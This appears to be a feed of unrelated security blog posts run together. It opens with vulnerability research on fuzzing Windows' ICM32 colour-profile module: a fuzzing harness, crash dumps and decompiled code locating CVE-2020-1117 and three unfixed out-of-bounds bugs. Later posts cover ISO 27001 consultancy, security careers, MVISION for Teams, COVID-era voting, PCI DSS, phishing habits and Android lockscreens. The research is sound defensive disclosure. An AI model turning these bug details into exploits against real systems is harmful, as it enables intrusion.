Windows started to ship Image Color Management (ICM) version 1.0 on Windows 95, and version 2.0 beginning with Windows 98 onwards. A major overhaul to Windows Color System (WCS) 1.0 happened in Windows Vista onwards. While ICC color profiles are binary files, WCS color profiles use XML as its file format. In this blog post, I am going to concentrate on ICC color profiles.

Microsoft has a list of supported Windows APIs. Looking into some of the obviously named APIs, such as OpenColorProfile, we can see that it is implemented in MSCMS.dll. This DLL is a generic entry point and supports loading of Microsoft’s Color Management Module (CMM) and third-party CMMs such as Adobe’s CMM. Microsoft’s CMM—the ICM—can be found as ICM32.dll in system32 directory. 


Figure 1: ICM32

Windows’ CMM was written by a third-party during the Windows 95 era and still ships more or less with the same code (with security fixes over the decades). Seeing such an old module gives me some hope of finding a new vulnerability. But this is also a small module that may have gone through multiple rounds of review and fuzzing: both by internal product security teams and by external researchers, reducing my hopes to a certain degree. Looking for any recent vulnerabilities in ICM32, we can see multiple bugs from 2017-2018 by Project Zero and ZDI researchers, but then relative silence from 2019 onwards.

Making a Harness

Although there is a list of ICM APIs in MSDN, we need to find an API sequence used by Windows for any ICC related operations. One of the ways to find our API sequence is to search a disassembly of Windows DLLs and EXEs in hope to find the color profile APIs being used. Another approach is to find a harness for open source Color Management Systems such as Little CMS (LCMS). Both of these end up pointing to very small set of APIs with functionality to open color profiles and create color transformations.

Given this information, a simple initial harness was written: 

#include <stdio.h>
#include <Windows.h>
#include <Icm.h>

#pragma comment(lib, "mscms.lib")

int main(int argc, char** argv)
{
    char dstProfilePath[] = "sRGB Color Space Profile.icm";
    tagPROFILE destinationProfile;
    HPROFILE   hDstProfile = nullptr;   

    destinationProfile.dwType = PROFILE_FILENAME;
    destinationProfile.pProfileData = dstProfilePath;
    destinationProfile.cbDataSize = (strlen(dstProfilePath) + 1);

    hDstProfile = OpenColorProfileA(&destinationProfile, PROFILE_READ,
        FILE_SHARE_READ, OPEN_EXISTING);
    if (nullptr == hDstProfile)
    {
        return -1;
    }   

    tagPROFILE sourceProfile;
    HPROFILE   hSrcProfile = nullptr;
    HTRANSFORM hColorTransform = nullptr;     

    DWORD dwIntent[] = { INTENT_PERCEPTUAL, INTENT_PERCEPTUAL };
    HPROFILE hProfileList[2];   

    sourceProfile.dwType = PROFILE_FILENAME;
    sourceProfile.pProfileData = argv[1];
    sourceProfile.cbDataSize = (strlen(argv[1]) + 1);

    hSrcProfile = OpenColorProfileA(&sourceProfile, PROFILE_READ,
        FILE_SHARE_READ, OPEN_EXISTING);
    if (nullptr == hSrcProfile)
    {
        return -1;
    }   

    hProfileList[0] = hSrcProfile;
    hProfileList[1] = hDstProfile;

    hColorTransform = CreateMultiProfileTransform(
        hProfileList,
        2,
        dwIntent,
        2,
        USE_RELATIVE_COLORIMETRIC | BEST_MODE,
        INDEX_DONT_CARE
    );

    if (nullptr == hColorTransform)
    {
        return -1;
    }   

    DeleteColorTransform(hColorTransform);
    CloseColorProfile(hSrcProfile);
    CloseColorProfile(hDstProfile);
    return 0;
}

Listing 1: Harness

Hunting for Corpus and Dictionary

Sites offering multiple color profiles can be found all over the internet. One of the other main source of color profile is images; many image files contain a color profile but require some programming/tools to dump their color profile to stand-alone files.

Simply skimming through the specification, we can also make sure the corpus contains at least one sample from all of the seven different color profiles. This along with the code coverage information can be used to prepare the first set of corpuses for fuzzing.

A dictionary, which helps the fuzzer to find additional code paths, can be prepared by combing through specifications and creating a list of unique tag names and values. One can also find dictionaries from open source fuzzing attempts on LCMS, etc.

Fuzzing

I used a 16-core machine to fuzz the harness with my first set of corpuses. Code coverage information from MSCMS.dll and ICM32.dll was used as feedback for my fuzzer. Crashes started to appear within a couple of days.

CVE-2020-1117 — Heap Overflow in InitNamedColorProfileData

The following crash happens in icm32!SwapShortOffset while trying to read out of bounds:

0:000> r
rax=0000023690497000 rbx=0000000000000000 rcx=00000000000000ff
rdx=000000000000ffff rsi=0000023690496f00 rdi=0000023690496fee
rip=00007ffa46bf3790 rsp=000000c2a56ff5a8 rbp=0000000000000001
 r8=0000000000000014  r9=0000023690497002 r10=0000000000000014
r11=0000000000000014 r12=000000c2a56ff688 r13=0000023690492de0
r14=000000000000000a r15=000000004c616220
iopl=0         nv up ei ng nz ac pe cy
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000293
icm32!SwapShortOffset+0x10:
00007ffa`46bf3790 0fb610          movzx   edx,byte ptr [rax] ds:00000236`90497000=??

0:000> !heap -p -a @rax
    address 0000023690497000 found in
    _DPH_HEAP_ROOT @ 23690411000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                             23690412b60:      23690496f00              100 -      23690496000             2000
    00007ffa51644807 ntdll!RtlDebugAllocateHeap+0x000000000000003f
    00007ffa515f49d6 ntdll!RtlpAllocateHeap+0x0000000000077ae6
    00007ffa5157babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb
    00007ffa51479da0 msvcrt!malloc+0x0000000000000070
    00007ffa46bf3805 icm32!SmartNewPtr+0x0000000000000011
    00007ffa46bf37c8 icm32!SmartNewPtrClear+0x0000000000000014
    00007ffa46c02d05 icm32!InitNamedColorProfileData+0x0000000000000085
    00007ffa46bf6e39 icm32!Create_LH_ProfileSet+0x0000000000004e15
    00007ffa46bf1973 icm32!PrepareCombiLUTs+0x0000000000000117
    00007ffa46bf1814 icm32!CMMConcatInitPrivate+0x00000000000001f4
    00007ffa46bf12a1 icm32!CWConcatColorWorld4MS+0x0000000000000075
    00007ffa46bf11f4 icm32!CMCreateMultiProfileTransformInternal+0x00000000000000e8
    00007ffa46bf1039 icm32!CMCreateMultiProfileTransform+0x0000000000000029
    00007ffa48f16e6c mscms!CreateMultiProfileTransform+0x000000000000024c
    00007ff774651191 ldr+0x0000000000001191
    00007ff7746514b4 ldr+0x00000000000014b4
    00007ffa505a7bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014
    00007ffa515aced1 ntdll!RtlUserThreadStart+0x0000000000000021

Listing 2: Crash info

icm32!SwapShortOffset reads unsigned short values, bswaps them and stores at the same location, giving this crash both read and write primitives.

unsigned __int16 *__fastcall SwapShortOffset(void *sourceBuff, unsigned int offset, unsigned int len)
{
  unsigned __int16 *endBuff; // r9
  unsigned __int16 *result; // rax

  endBuff = (sourceBuff + len);
  for ( result = (sourceBuff + offset); result < endBuff; ++result )
    *result = _byteswap_ushort(*result);        // read, bswap and write
  return result;
}

Listing 3: SwapShortOffset decompiled

The crashing function icm32!SwapShortOffset doesn’t immediately point to the root cause of the bug. For that, we need to go one call up to icm32!InitNamedColorProfileData.

__int64 __fastcall InitNamedColorProfileData(__int64 a1, void *hProfile, int a3, _DWORD *a4)
{
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, 0i64);      // getting size of ncl2 element
  if ( errCode )
    return errCode;
  minSize = pBuffSize[0];
  if ( pBuffSize[0] < 0x55 )
    minSize = 0x55;
  pBuffSize[0] = minSize;
  outBuff = SmartNewPtrClear(minSize, &errCode);                                    // allocating the buffer for ncl2
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, outBuff);    // reading ncl2 elements to buffer
  if ( !errCode )
  {
    ...
    ...
    totalSizeToRead = count * totalDeviceCoord;
    if ( totalSizeToRead < 0xFFFFFFFFFFFFFFAEui64 && totalSizeToRead + 0x51 <= pBuffSize[0] )  // totalSizeToRead + 0x51 <= element size?
    {
      currPtr = outBuff + 0x54;            // wrong offset of 0x54 is used
      ...
      ...
      do
      {   
        SwapShortOffset((currPtr + 0x20), 0, 6u);
        ...
        --count;
      }while(count)

Listing 4: InitNamedColorProfileData decompiled

Here the code tries to read the ‘ncl2’ tag/element and get the size of the stream from file. A buffer is allocated and the same call is made once again to read the complete content of the element ‘ncl2’. This buffer is parsed to find the count and number of device coordinates, and the values are verified by making sure read/write ends up with in the buffer size. The vulnerability here is that the offset (0x51) used for verification is smaller than the offset (0x54) used to advance the buffer pointer. This error provides a 3 byte out of bound read and write.

The fix for this was pretty straight forward—change the verification offset to 0x54, which is how Microsoft fixed this bug.

Additional Vulnerabilities

While looking at the previous vulnerability, one can see a pattern of using the CMGetPartialProfileElement function for reading the size, allocation, and reading content. This sort of pattern can introduce bugs such as unconstrained size or integer overflow while adding an offset to the size, etc. I decided to pursue this function and see if such instances are present within ICM32.dll.

I found three instances which had an unchecked offset access: CMConvIndexToNameProfile, CMConvNameToIndexProfile and CMGetNamedProfileInfoProfile. All of these functions are accessible through exported and documented MSCMS functions: ConvertIndexToColorName, CMConvertColorNameToIndex, and GetNamedProfileInfo respectively.

__int64 __fastcall CMConvIndexToNameProfile(HPROFILE hProfile, __int64 a2, __int64 a3, unsigned int a4)
{
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, 0i64);    // read size
  if ( !errCode )
  {
    allocBuff = SmartNewPtr(pBuffSize[0], &errCode);
    if ( !errCode )
    {
      errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, allocBuff);    // read to buffer
      if ( !errCode )
      {
        SwapLongOffset((allocBuff + 12), 0, 4u);         // 12 > *pBuffSize ?
        SwapLongOffset((allocBuff + 16), v12, v13);

Listing 5: CMConvIndexToNameProfile decompiled

The bug discovered in CMConvIndexToNameProfile and the other two functions is that there is no minimum length check for ‘ncl2’ elements and offsets 12 and 16 are directly accessed for both read and write—providing out of bound read/write to allocBuffer, if the size of allocBuffer is smaller than 12.

Microsoft decided not to immediately fix these three vulnerabilities due to the fact that none of the Windows binaries use these functions. Independently, we did not find any Windows or third-party software using these APIs.

Conclusion

In part one of this blog series, we looked into color profiles, wrote a harness, hunted for corpus and successfully found multiple vulnerabilities. Stay tuned for part two, where we will be looking at a relatively less talked about vulnerability class: uninitialized memory.

How small organisations can fast-track ISO 27001 implementation

Small businesses are increasingly understanding the importance of ISO 27001, the international information security standard, but many struggle to find the resources to commit to an implementation project.

If you’re among those, our ISO 27001 Online FastTrack™ Consultancy – Micro Organisations is the ideal solution.

Our team of experts will have you ready for accredited certification in just three months and for a one-off fee.

You will be assigned a qualified consultant who will work with you and perform all the key activities involved in setting up an ISMS (information security management system) that’s in line with ISO 27001’s requirements and that reflects your business objectives.

We do this by following our proven nine-step approach for implementing an ISMS.

Our ISO 27001 implementation method

  1. Project mandate

Collate information for your information security policy to define the scope of the ISMS and facilitate management approval of essential documents.

  1. Project initiation

Develop the project’s goals, and ensure that both the project and ISMS deliver their objectives.

  1. ISMS initiation

Establish the requirements of each ISMS process and the tasks required to develop and implement them.

  1. Management framework

Ensure the ISO 27001 requirements relating to organisational context, scope and leadership are fully addressed, and align the ISMS to your organisation and business objectives.

  1. Baseline security criteria

Ensure that security controls meet your business requirements.

  1. Risk management

Develop a robust information security risk management process, identify appropriate information security risk treatments and controls, and produce the risk treatment plan and Statement of Applicability.

  1. Implementation

Address the remaining ISMS processes and controls, including documentation and training.

  1. Measure, monitor and review

Establish processes for measuring and monitoring the effectiveness of the ISMS, including an internal ISMS audit and management review.

  1. Certification audit

We will help you select an independent, accredited certification body appropriate to your organisation.

We will also assess the findings of the initial certification audit, and set out the tasks and activities required to maintain the ISMS and accredited certification.



Fast-track your ISO 27001 implementation project

ISO 27001 Online FastTrack™ Consultancy – Micro Organisations helps you reduce the time and effort it takes to implement an ISMS and eliminates the cost of extensive consultancy work.

Plus, we guarantee that you will achieve certification-readiness within the agreed project timeline, and will cover any extra direct remedial costs necessary to ensure that you pass your final certification audit.

Find out more

The post How small organisations can fast-track ISO 27001 implementation appeared first on IT Governance UK Blog.

Career change? Cybersecurity companies are hiring.

Careers in Cybersecurity

Career change? Cybersecurity companies are hiring.

If you’re thinking career change or career shift, there’s a field that has an estimated 4 million jobs open. Cybersecurity.

According to survey and research data from the International Cybersecurity Organization (ICS)2, there’s a cybersecurity workforce gap—a terrifically high volume of jobs left unfilled. Published in 2019, the gap they identified looked like this:

  • Nearly 500,000 jobs unfilled in the U.S.
  • Globally, a gap of 4 million jobs was reported.
  • 65% of the respondents say they’re short on cybersecurity staff.

Needless to say, there’s opportunity in the field for both technical and non-technical roles.

Here’s an important thing to keep in mind about cybersecurity:, it’s not solely about understanding technology. It’s about understanding people too and how people and technology interact.

The moment you see cybersecurity through that broader lens, you can see how the field opens widely to encompass a range of roles. Of course, there are analysts and engineers, yet it also includes other roles like digital forensics and cyber investigation, healthcare information security, cryptography, and even cyber law. Additionally, there’s needed expertise in the realms of privacy, governance, ethics, and even digital ethics. And if you take a role with a security company such as ours, the opportunity further extends to positions in account management, marketing, and operations. (In fact, you can drop by our careers page for a look at our current openings and what workday life is like around here.)

Why now’s a great time to consider a cybersecurity career

There are plenty of reasons. Above that data published in 2019, our unprecedented reliance on the internet to work, learn, and stay connected in 2020, demand for cybersecurity jobs is yet more so on the rise. As so many of us turned increasingly to the internet to get through our day, the same is true for hackers and crooks.

With that, let’s take a quick look at several of the factors working in your favor as you consider a change.

There’s demand for cybersecurity jobs.

We’ve all seen the news stories of major breaches at big retailers, credit reporting agencies, hotels, and even healthcare providers. It’s not just the private sector that’s been grappling with cybersecurity concerns, there’s need in the public sector as well—like municipalities. In all, every organization needs cybersecurity (just as we all need cybersecurity for our homes), and thus there’s plenty of opportunity out there. Using just one of the many possible cybersecurity roles as an example, the U.S. Bureau of Labor Statistics predicts a 32% increase in demand for information security analysts through 2028—which is far higher than the average of other professions.

You don’t need a specific degree in cybersecurity to get a job.

In fact, the same (ICS)2 survey discovered that only 42% of current cybersecurity pros said that their first job after higher education was in the field of cybersecurity. In other words, the majority of cybersecurity pros ended up that way by some means of career shift or change. And they got there through certifications and training rather than by way of a degree from a college or university.

Transferrable skills absolutely apply.

Our own Chief Human Resources Officer, Chatelle Lynch, put it quite well in an interview with Business Insider just a few weeks ago: “It’s no secret that the demand for cybersecurity staff has steadily grown over the past decade,” she says. “This means opportunity, so if you don’t have a degree, don’t let that slow you down. You may have unique work experience or relevant certifications, alternative learning, or transferable skills that you need to make sure you highlight when applying and interviewing.”

For example, she goes on to say that prior military service, IT experience, and volunteer or hobbyist activities (even online gaming) are a good foundation for cybersecurity roles.

Cybersecurity employers seek candidates with non-technical soft skills.

These skills absolutely apply, and they’re sought after skills as well. The ability to work independently, lead projects, write and document well, and particularly strong people skills are vital for a role where you’ll be interfacing with numerous individuals, departments, and business units. Likewise, as called out above, certain roles focus more on the non-technical side of security solutions.

Getting trained in cybersecurity

The beauty of making a career change to cybersecurity is that there are plenty of ways you can get it done at home and on your time.

If you’re just getting started, you can test the waters for free or at relatively low cost with a Massively Open Online Course (MOOC) that gives you the basics on cybersecurity. Future Learn’s “Introduction to Cybersecurity”  from The Open University is one example of an intro program, as is the University of Michigan’s “Securing Digital Democracy” class that’s offered through Coursera.

If you’re already an IT pro or have a strong technical background, there are similar MOOC courses available that cater to your current level of knowledge and skill. The University of Maryland’s “Cybersecurity Specialization” and “Usable Security” are geared accordingly.

For a list of cybersecurity programs available online, drop by CyberDegrees.org. Their listing is one of many good places to start.

Other free and low-cost avenues out there include subscribing to some security bloggers, grabbing some hands-on work with coding and IT networking fundamentals from online learning companies like Udemy, Codecademy, and Khan Academy, or joining some online cybersecurity groups for a little professional networking. In all, there’s plenty of opportunity to learn from others, both in structured class settings and in more unstructured peer and mentorship relationships.

Prepare for that online interview

When you’re ready to start your job search, there’s a good chance that your interview will be conducted online. Online interviews have been part of the job-hunting landscape for a few years now, yet with many employers enacting work from home measures, it’s the way hiring gets done right now. I expect this to continue, as employers have embraced its many benefits, particularly in the early stages of interviews. If the prospect of an online interview is new to you, I put together a pair of articles this spring that can help.

Your cybersecurity career

As you make the jump, here’s the most important thing you’ll need: a love of technology and a desire to protect the people who use it. If you can combine a drive to understand both technology and people better with the further drive to see it all through, you’ll be well on your way. Like any career shift or change, there’s work ahead, yet it’s my impression that our field is a welcoming and supportive one—and very much on a keen lookout for new talent.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Career change? Cybersecurity companies are hiring. appeared first on McAfee Blogs.

MVISION Cloud for Microsoft Teams

McAfee MVISION Cloud for Microsoft Teams, now offers secure guest user collaboration features allowing the security admins to not only monitor sensitive content posted in the form of messages and files within Teams but also monitor guest users joining Teams to remove any unauthorized guests joining Teams.  

Working from home has become a new reality for many, as more and more companies are requesting that their staff work remotely. Already, we are seeing how solutions that enable remote work and learning across chat, video, and file collaboration have become central to the way we work. Microsoft has seen an unprecedented spike in Teams usage and they have more than 75 million daily users as of May 2020, a 70% increase in daily active users from the month of March1 

What’s New in MVISION Cloud for Microsoft Teams 

MVISION Cloud for Microsoft Teams now provides policy controls for security admins to monitor and remove unauthorized guest users based on their domains, the team guest users are joining etc. As organizations use Microsoft Teams to collaborate with trusted partners to exchange messages, participate in calls, and share files, it is critical to ensure that partners are joining teams designated for external communication and only guest users from trusted partner domains are joining the teams.  

 Organizations can configure policies in McAfee MVISION Cloud to:

  • Monitor guest users from untrusted domains and remove the guest users automatically. Security admins do not have to reach out to Microsoft Teams admin and ask them to remove any untrusted guest users manually.  
  • Define the list of teams designated for external communication and make sure that users from partner organizations are joining only those teams and not any internal teams. If the partner users join any internal-only teams, they will be removed by McAfee MVISION Cloud automatically.  

With these new features, McAfee offers complete data protection and collaboration control capabilities to enable organizations to safely collaborate with partners without having to worry about exposing confidential data to guest users 

Here is the comprehensive list of use cases organizations can enable by using MVISION Cloud for Microsoft Teams. 

  • Modern data security. IT can extend existing DLP policies to messages and files in all types of Teams channels, enforcing policies based on keywords, fingerprints, data identifiers, regular expressions and match highlighting for content and metadata. 
  • Collaboration control. Messages or files posted in channels can be restricted to specific users, including blocking the sharing of data to any external location. 
  • Guest user control. Guest users can be restricted to join only teams meant for external communication and unauthorized guest users from any domains other than trusted partner domains can be automatically removed.  
  • Comprehensive remediation. Enables auditing of regulated data uploaded to Microsoft Teams and remediates policy violations by coaching users, notifying administrators, quarantining, tombstoning, restoring and deleting user actions. End users can autonomously correct their actions, removing incidents from IT’s queue. 
  • Threat prevention. Empowers organizations to detect and prevent anomalous behavior indicative of insider threats and compromised accounts. McAfee captures a complete record of all user activity in Teams and leverages machine learning to analyze activity across multiple heuristics to accurately detect threats. 
  • Forensic investigations: With an auto-generated, detailed audit trail of all user activity, MVISION Cloud provides rich capabilities for forensics and investigations. 
  • On-the-go security, for on-the-go policies. Helps secure multiple access modes, including browsers and native apps, and applies controls based on contextual factors, including user, device, data and location. Personal devices lacking adequate control over data can be blocked from access. 

McAfee MVISION Cloud for Microsoft Teams is now in use with a substantial number of large enterprise customers to enable their security, governance and compliance capabilities. The solution fits all industry verticals due to the flexibility of policies and its ease of use. 

The post MVISION Cloud for Microsoft Teams appeared first on McAfee Blogs.

U.S. Election 2020 – Don’t Let COVID-19 Misinformation Suppress Your Vote

Elections 2020

U.S. Election 2020 – Don’t Let COVID-19 Misinformation Suppress Your Vote  

In the early days of the COVID-19 pandemic, another pandemic of sorts took root—this one an “infodemic.” Whether designed to mislead, instill fear, capitalize on crank remedies, or push phony cures that caused harm or worse, millions of outright false stories about COVID-19 proliferated across the internet. And continue to do so.

Now, with our upcoming election in the U.S., there’s concern that this infodemic of misinformation about COVID-19 will keep people away from the polls or from working at them. Particularly elders.

With this blog, my aim is to point you toward trustworthy resources online that can help you get your vote cast and counted safely.

COVID-19 misinformation is on the rise

First, a word about COVID-19 misinformation in general.

Since the initial outbreak, we’ve monitored online threats and scams related to COVID-19. As shown in our July 2020 Threat Report, the first three months saw the number of malicious and scam websites related to COVID-19 jump from 1,600 to more than 39,000, along with a wave of spam emails and posts that peddled bogus sites for protective gear, masks, and cures. Now, in mid-September, our threat detection team has uncovered three million online threats related to COVID-19 and counting. (See the daily tally here for the latest figures.)

Elsewhere, global and national public health officials have worked diligently to counter these waves of misinformation, such as the World Health Organization’s COVID-19 “mythbuster” site, in addition to further mythbusting from major news outlets around the world and yet more mythbusting from respected science publications. However, instances of misinformation, both big and small, persist and can lead to negative health consequences for those who buy into such misinformation.

Resources for voting safely 

Whether you’ll vote in person or by mail, these links provide a mix of trustworthy information about voting and the latest verified information about the virus:

  • vote.org COVID-19 Page: This is a one-stop site that provides voting resources and information on a state-by-state basis. Here you’ll find the official voter information for your state, links to your state’s election website, and the means to request an absentee or mail-in ballot (as allowed) by your state.
  • The U.S. Center for Disease Control and Prevention’s COVID-19 Site: The focus of this site is how to protect yourself and others and includes the latest information on how COVID-19 spreads, how to select and use a mask, how to practice effective social distancing, and more. The site also covers activities and going out, which are applicable to voters heading to the polls.
  • The World Health Organization COVID-19 Site: This site offers further advice and resources for preventing the spread of COVID-19, along with staying well both physically and mentally.
  • Verified by the United Nations: Verified is a daily or weekly briefing that you can sign up for through the U.N., which contains “content you can trust: life-saving information, fact-based advice, and stories from the best of humanity.”

Be aware that our collective understanding of COVID-19 continues to evolve. The pandemic isn’t even a year old at this time, and new research continues to reveal more about its nature. Be sure to check with these resources along with your local public health resources for the latest on the virus and how to stay safe.

How to Vote by Mail in All 50 States

If you’re considering voting by mail, the following is for you. Published by U.S. News and World Report, this article breaks down how you can vote by mail in your state. While all 50 states allow for mail-in voting in some form or fashion, specifics vary, and some states make it easier to do than others. (For example, a handful of states like Texas, Indiana, and Louisiana currently do not allow COVID-19 concerns as a valid reason for requesting a mail-in ballot.)

Note that this article was published at the end of August, so be sure to follow the links for your state as published in the article for the absolute latest information. Yet don’t wait to look into your absentee or mail-in options. As noted above, each state has its terms and deadlines, so it’s best to review your options now.

Meanwhile, five states— Colorado, Hawaii, Oregon, Washington state, and Utah already conduct their elections entirely by mail. Such practices have proven to be successful alternatives to voting in person, they have slightly increased voter turnout while minimizing the risks of voter fraud.

Follow trusted resources and vote safely this year

Get your vote out safely. Whether it’s by visiting the polls following the safety guidelines or by way of mail as also allowed by your state, it can be done—particularly when you have trusted information sources at hand.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post U.S. Election 2020 – Don’t Let COVID-19 Misinformation Suppress Your Vote appeared first on McAfee Blogs.

Request for Comments: PCI DSS Version 4.0 Draft Standard

 

From 23 September to 13 November 2020, PCI SSC stakeholders can participate in a Request for Comments (RFC) on a draft of PCI Data Security Standard Version 4.0 (PCI DSS v4.0 Draft v0.2 for RFC). This is the second RFC for the draft of PCI DSS v4.0. The first RFC was held in late 2019, and feedback received during that RFC has been incorporated into the draft.

Unexpected Side Effects: How COVID-19 Affected our Click Habits

Reading Time: ~ 4 min.

Phishing has been around for ages and continues to be one of the most common threats that businesses and home users face today. But it’s not like we haven’t all been hearing about the dangers of phishing for years. So why do people still click?

That’s what we wanted to find out when we conducted our most recent survey. We checked in with thousands of office workers across seven different countries to get a global perspective on phishing and people’s individual click habits. Then we partnered with Dr. Prashanth Rajivan, assistant professor at the University of Washington, to gain a deeper understanding of phishing and those habits, as well as how things have shifted during COVID-19 in our new report: COVID-19 Clicks: How Phishing Capitalized on a Global Crisis.

In this blog post, we’ve summarized this comprehensive report and included tips for how to stay safe, but we strongly encourage you to check out the full writeup.

Why do people still click?

3 in 10 people worldwide clicked a phishing link in the past year. Among Americans, it’s 1 in 3.

According to Dr. Rajivan, what we need to consider is that human beings aren’t necessarily good at dealing with uncertainty, which is part of why cybercriminals capitalize on upheaval (such as a global pandemic) to launch attacks.

“People aren’t great at handling uncertainty. Even those of us who know we shouldn’t click on emails from unknown senders may feel uncertain and click anyway. That’s because we’ve likely all clicked these kinds of emails in the past and gotten a positive reward. The probability of long-term risk vs. short-term reward, coupled with uncertainty, is a recipe for poor decision-making, or, in this case, clicking what you shouldn’t.”

– Prashanth Rajivan, Ph.D.

Tip # 1

  • For businesses: Ensure workers have clear distinctions between work and personal time, devices, and obligations. This helps reduce the amount of uncertainty that can ultimately lead to phishing-related breaches.
  • For individuals: Hackers often exploit security holes in older software versions and operating systems. Update software and systems regularly to help shut the door on malware.

Has phishing increased since COVID-19 began

At least one in five people have received a phishing email related to COVID-19.

There’s no doubt that the global COVID-19 pandemic has changed a lot about how we live and work. According to our survey, 54% of workers spend more time working from home than they did before the pandemic. With more people connecting to the internet outside of corporate networks and away from the watchful eyes of IT teams, it’s to be expected that cybercriminals would take advantage.

“[We’ve seen] massive spikes […] in phishing URLs targeting COVID-related topics. For example, with more people spending time at home, use of streaming services has gone up. In March alone, we saw a 3000% increase in phishing URLs with ‘youtube’ in the name.

– Grayson Milbourne, security intelligence director, Carbonite + Webroot, OpenText Companies

Regardless, the majority of people surveyed still think they are at least the same level of prepared or more prepared to spot phishing email attempts, now that they’ve spent more time working from home

“People are taking increased physical safety measures in the pandemic, including mask wearing, social distancing, more frequent hand-washing, etc. I think this heightened level of precaution and awareness could cause people to slightly overestimate their overall safety, including their safety regarding online threats.”

– Prashanth Rajivan, Ph.D.

Tip #2

  • For businesses: Know your risk factors and over prepare. Once you’ve assessed the risks, you can create a stronger data breach response plan.
  • For individuals: Stay on your toes. By being vigilant and maintaining a healthy dose of suspicion about all links and attachments in messages, you can significantly decrease your phishing risk.

People say they know better. Do they really?

81% of people say they take steps to determine if an email message is malicious. Yet 76% open emails and click links from unknown senders.

When we asked Dr. Rajivan why these numbers don’t line up, he said the difference is between knowing what you should do and actually doing it

“There are huge differences between knowing what to do and actually operationalizing that knowledge in appropriate scenarios. I suspect many people don’t really take the actions they reported, at least not on a regular basis, when they receive suspicious emails.”

– Prashanth Rajivan, Ph.D.

Tip #3

  • For businesses: Back up data and ensure employees can access and retrieve data no matter where they are. Accidents happen; what matters most is being able to recover quickly and effectively. Don’t forget to back up collaboration tools too, such as Microsoft® Teams and the Microsoft® 365 suite.
  • For individuals: Make sure important data and files are backed up to secure cloud storage or an external hard drive. In the case of a hard drive, make sure it’s only connected while backing up, so you don’t risk backing up infected or encrypted files. If it’s a cloud back up, use the kind that lets you to restore to a specific file version or point in time.

What’s the way forward?

All over the world, workers say that in order to be better prepared to handle cyberattacks, they need more education.

According to global respondents, more knowledge and better understanding is key for stronger cyber resilience. The top three things people everywhere said would help them better prepare themselves to handle cyber threats like phishing were: knowing which tools could help prevent an attack, knowing what to do if you fall victim to an attack, and understanding the most common types of attacks.

Dr. Rajivan points out that, if businesses are asking individuals to make changes to their own behavior for the greater safety of all, then they need to make it clear they are willing to invest in their people.

“By creating a feeling of personal investment in the individuals who make up a company, you encourage the employees to return that feeling of investment toward their workplace. That’s a huge part of ensuring that cybersecurity is part of the culture. Additionally, if we want to enable employees to assess risk properly, we need to cut down on uncertainty and blurring of context lines. That means both educating employees and ensuring we take steps to minimize the ways in which work and personal life get intertwined.”

– Prashanth Rajivan, Ph.D.

Tip #4

  • For businesses: Invest in your people. Empower your people with regular training to help them successfully avoid scams and exercise appropriate caution online.
  • For individuals: Educate yourself. Even if your company provides training, Dr. Rajivan recommends we all subscribe to cybersecurity-related content in the form of podcasts, social media, blogs, and reputable information sources to help keep strong, cyber resilient behavior top-of-mind.

Want more details on click habits and shifting risks during COVID-19?
Read our full report, COVID-19 Clicks: How Phishing Capitalized on a Global Crisis, to start building out your cybersecurity education today. And be sure to check back here on the Webroot blog for the latest in news in phishing prevention.          

The post Unexpected Side Effects: How COVID-19 Affected our Click Habits appeared first on Webroot Blog.

Lockscreen and Authentication Improvements in Android 11


[Cross-posted from the Android Developers Blog]
As phones become faster and smarter, they play increasingly important roles in our lives, functioning as our extended memory, our connection to the world at large, and often the primary interface for communication with friends, family, and wider communities. It is only natural that as part of this evolution, we’ve come to entrust our phones with our most private information, and in many ways treat them as extensions of our digital and physical identities.

This trust is paramount to the Android Security team. The team focuses on ensuring that Android devices respect the privacy and sensitivity of user data. A fundamental aspect of this work centers around the lockscreen, which acts as the proverbial front door to our devices. After all, the lockscreen ensures that only the intended user(s) of a device can access their private data.

This blog post outlines recent improvements around how users interact with the lockscreen on Android devices and more generally with authentication. In particular, we focus on two categories of authentication that present both immense potential as well as potentially immense risk if not designed well: biometrics and environmental modalities.

The tiered authentication model

Before getting into the details of lockscreen and authentication improvements, we first want to establish some context to help relate these improvements to each other. A good way to envision these changes is to fit them into the framework of the tiered authentication model, a conceptual classification of all the different authentication modalities on Android, how they relate to each other, and how they are constrained based on this classification.

The model itself is fairly simple, classifying authentication modalities into three buckets of decreasing levels of security and commensurately increasing constraints. The primary tier is the least constrained in the sense that users only need to re-enter a primary modality under certain situations (for example, after each boot or every 72 hours) in order to use its capability. The secondary and tertiary tiers are more constrained because they cannot be set up and used without having a primary modality enrolled first and they have more constraints further restricting their capabilities.

  1. Primary Tier - Knowledge Factor: The first tier consists of modalities that rely on knowledge factors, or something the user knows, for example, a PIN, pattern, or password. Good high-entropy knowledge factors, such as complex passwords that are hard to guess, offer the highest potential guarantee of identity.

    Knowledge factors are especially useful on Android becauses devices offer hardware backed brute-force protection with exponential-backoff, meaning Android devices prevent attackers from repeatedly guessing a PIN, pattern, or password by having hardware backed timeouts after every 5 incorrect attempts. Knowledge factors also confer additional benefits to all users that use them, such as File Based Encryption (FBE) and encrypted device backup.

  1. Secondary Tier - Biometrics: The second tier consists primarily of biometrics, or something the user is. Face or fingerprint based authentications are examples of secondary authentication modalities. Biometrics offer a more convenient but potentially less secure way of confirming your identity with a device.

We will delve into Android biometrics in the next section.

  1. The Tertiary Tier - Environmental: The last tier includes modalities that rely on something the user has. This could either be a physical token, such as with Smart Lock’s Trusted Devices where a phone can be unlocked when paired with a safelisted bluetooth device. Or it could be something inherent to the physical environment around the device, such as with Smart Lock’s Trusted Places where a phone can be unlocked when it is taken to a safelisted location.

    Improvements to tertiary authentication

